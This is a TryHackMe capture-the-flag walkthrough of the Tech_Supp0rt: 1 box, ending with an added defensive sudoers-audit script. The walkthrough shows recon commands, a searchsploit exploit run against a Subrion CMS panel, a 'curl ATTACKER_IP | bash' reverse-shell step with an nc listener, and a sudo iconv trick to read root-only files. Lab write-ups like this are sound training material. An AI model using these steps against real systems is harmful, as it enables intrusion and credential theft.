Hello, Tech_Supp0rt: 1? I Think I Have a Problem with My CMS: TryHackMe Walkthrough
In this walkthrough, we explore the Tech_Supp0rt: 1 CTF on TryHackMe, covering steps such as using Nmap for scanning, Gobuster for directory enumeration, enum4linux for SMB share discovery, exploiting a Subrion panel, and escalating privileges to root. The process involves identifying open ports, finding directories and shares, cracking credentials, exploiting a vulnerable CMS, and ultimately gaining root access to the system.
Step 1: Nmap
nmap -T4 -sV -sC -A -p- 10.10.185.192 --min-rate 1000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 4 hops
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2023-07-12T22:43:56+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-07-12T17:13:54
|_ start_date: N/A
|_clock-skew: mean: -1h49m57s, deviation: 3h10m29s, median: 1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Step 2: Gobuster
gobuster dir --url http://10.10.185.192/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -q
Step 3: enum4linux
Let's run a scan to see which shares are available.
enum4linux 10.10.185.192
Step 4: SMB Share
smbclient //10.10.185.192/websvr
Let's see what is in this text file.
Hmmm. Let's see if we can crack this with CyberChef.
Step 5: Subrion Panel
Let's enumerate for a Subrion panel using gobuster.
gobuster dir --url http://10.10.185.192/subrion/ -f -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o subrion.txt -b 301,302,304 -t 100 -q
We discovered an admin panel. Let's plug in the credentials we gathered from our earlier recon.
It looks like the CMS version is 4.2.1. Searchsploit has an exploit for this.
Copy the exploit into the current directory with:
searchsploit -m php/webapps/49876.py
Step 6: Exploit
Run the exploit against the panel:
python3 49876.py -u http://10.10.185.192/subrion/panel/ --user=admin --passw=********
Nice! Now, let's get a more stable shell on here. First, let's start a Python web server in the directory where our reverse shell script is located:
python3 -m http.server 8000
Then start a netcat listener to catch the shell:
rlwrap nc -lvnp 1337
Finally, pull the script onto the victim box (ATTACKER_IP is the address of our own machine, where the Python web server is running, not the target's address):
curl http://ATTACKER_IP:8000/shell.sh | bash
Let's upgrade it:
python -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm-256color
Step 7: Privesc and Root
First, let's check crontab:
cat /etc/crontab
No attack vector here; let's check for SUID binaries:
find / -type f -perm -04000 -ls 2>/dev/null
Nothing here either; let's dig around the file system for something useful.
/var/www/html/wordpress/wp-config.php has a password that we can use to pivot.
Let's check /etc/passwd for usernames.
We can take the password we found in wp-config.php and log in as scamsite.
And we're in. Let's see what we can run as sudo.
We can run /usr/bin/iconv as sudo. Let's check GTFOBins for a privesc method.
LFILE=/root/root.txt
sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
From here we could use this binary to read the /etc/shadow file and elevate permissions or create ways to maintain persistence. Overall, this box was very enjoyable and I'm glad there was a unique vector in order to gain root-level privileges.
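The root vector above is a sudoers rule that lets a low-privileged user run a file-reading binary (iconv) as root. The following audit script is an added example, not part of the original walkthrough or of GTFOBins: it parses a sudoers file and flags rules of that shape so an administrator can find them before an attacker does. The sudoers text and the user names are constructed to mirror this box, and the watch-list of binaries is a small illustrative subset.

```python
import re

# Binaries whose ordinary use reads an arbitrary file path (illustrative subset).
FILE_READ_BINARIES = {"iconv", "cat", "less", "more", "head", "tail", "base64"}

# Constructed sample sudoers, modelled on the misconfiguration in this box.
SAMPLE_SUDOERS = """\
# constructed sample, not a real sudoers file
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
scamsite ALL=(ALL) NOPASSWD: /usr/bin/iconv
webadmin ALL=(root) /usr/bin/systemctl restart apache2, /usr/bin/tail
"""

# user  host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\((.*?)\))?\s*(.*)$")

def parse_sudoers(text):
    """Return (user, host, runas, tags, [commands]) for each user specification."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, rest = m.groups()
        tags = []
        # Upper-case tags such as NOPASSWD: sit before the command list.
        while ":" in rest and rest.split(":", 1)[0].strip().isupper():
            tag, rest = rest.split(":", 1)
            tags.append(tag.strip())
        cmds = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append((user, host, runas or "root", tags, cmds))
    return rules

def find_file_read_sudo(text):
    """Return (user, command, nopasswd) for rules granting a bare file-reading binary."""
    findings = []
    for user, _host, _runas, tags, cmds in parse_sudoers(text):
        for cmd in cmds:
            if cmd == "ALL":
                continue                          # full sudo is a separate finding
            words = cmd.split()
            binary = words[0].rsplit("/", 1)[-1]
            # A bare binary lets the caller choose the file; pinned arguments do not.
            if binary in FILE_READ_BINARIES and len(words) == 1:
                findings.append((user, cmd, "NOPASSWD" in tags))
    return findings

if __name__ == "__main__":
    for user, cmd, nopasswd in find_file_read_sudo(SAMPLE_SUDOERS):
        print(f"{user}: {cmd}{' (NOPASSWD)' if nopasswd else ''} can read any file as root")
```

The fix for a flagged rule is to remove it or pin the binary to the exact arguments the user needs, so the file path is no longer caller-controlled.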